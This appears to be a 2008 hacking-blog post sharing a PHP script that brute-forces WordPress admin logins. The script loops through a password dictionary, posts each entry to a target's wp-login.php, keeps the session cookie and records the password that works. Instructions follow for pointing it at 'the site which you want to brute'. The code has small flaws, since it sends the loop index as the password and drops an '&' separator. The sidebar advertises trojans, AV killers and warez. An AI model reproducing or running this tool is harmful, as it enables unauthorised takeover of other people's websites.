ignore_user_abort(1);
set_time_limit(0);
$url = "http://XXXX.com/wp-login.php"; //<- Put wordpress site name here
$user = "admin"; // <- Default username in wordpress. Almost you don't need to change it for most sites.
// <- password list file, put file in same folder where you put this file
$cookie = realpath("cookie.txt"); // <- Cookie file. If you get logged in admin panel, In this script will save cookies.
$success = "success.txt"; // <- If you get success to login, In this file password will be stored.
$line = file("mil-dic.txt");
foreach ($line as $pwd => $line) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "log=admin&pwd=".$pwd."rememberme=forever&wp-submit=Log+In&redirect_to=wp-admin%2F&testcookie=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if (preg_match("/Dashboard/i", $postResult)) {
echo "Congo! You are logged now, Password is :- " . $pwd . "";
$fp = fopen("success.txt","a");
fwrite($fp,$pwd);
fclose($fp);
die();
}
else
{ echo "Passowrd wrong
";
}
}
?>
In line no 4, add url of site which you want to brute.
Make two txt files and add 777 permissions to them if you are running on linux.
- cookie.txt
- success.txt
Change path of file containing passwords to brute in line no 9
credit:- AbaaS
Sign by xXx - xXx Rulez
This entry was posted
on 11:56 AM
and is filed under
Hacks
.
You can leave a response
and follow any responses to this entry through the
Subscribe to:
Post Comments (Atom)
.
Label Cloud
Subscribe via email
Labels
- [XXX Official] :D :D (1)
- Antyvirus Tools (2)
- Apple (1)
- AV killer (1)
- BAT Files (1)
- BINDERS (2)
- Blogging (3)
- BLUETOOTH (1)
- Bots (1)
- Chrome (1)
- Downloads (4)
- E-BOOKS (5)
- Earn MoneY Online (4)
- Exploits (1)
- Fun (4)
- GFX (3)
- Google (6)
- Guide to PC (3)
- Hacking Tools (7)
- Hacks (16)
- Hax Editors (2)
- Haxing (1)
- JAVASCRIPTS (2)
- Links (1)
- LISTS (5)
- Mobile Stuff (1)
- MOZILLA ADD-ONS (2)
- Mozilla FireFox (3)
- Orkut (6)
- Orkut Updates (2)
- PAYPAL (1)
- PHP (1)
- Premium Accounts (1)
- Proxy (2)
- PSP (1)
- RADIO STATION (1)
- Rapidshare (2)
- SequeritY (3)
- Source (4)
- TIPS (28)
- TorrenT (1)
- Tricks (37)
- Trojans (2)
- Tutorials (22)
- Virus (1)
- WareZ Stuff (2)
- Windows 7 (4)
- WINDOWS XP (6)
- WORDPRESS (1)
- XSS (1)
Followers
Archives
-
▼
2008
(82)
-
▼
November
(16)
- Spytector Removal Guide
- BEST KEYBOARD SHORTCUTS
- List of SMTP Servers 2
- List of SMTP Servers
- The Ultimate Guide to PC SecurityBeing a hacker, y...
- How to hide files in a jpg
- Some Google Tips
- Wireless Hack Toolz (2008)
- Make free callsthere are many sites today which wi...
- Wifi Hacks (2009)
- How To Renew IP address
- How To Increase Scraps on Orkut
- Big Hack Pack 2008
- [l33t]PHP Wordpress Brute Forcer
- Instant Messenger Status Indicator - AIM, Yahoo, I...
- Change Office 2007 Product Key
-
▼
November
(16)
1 comments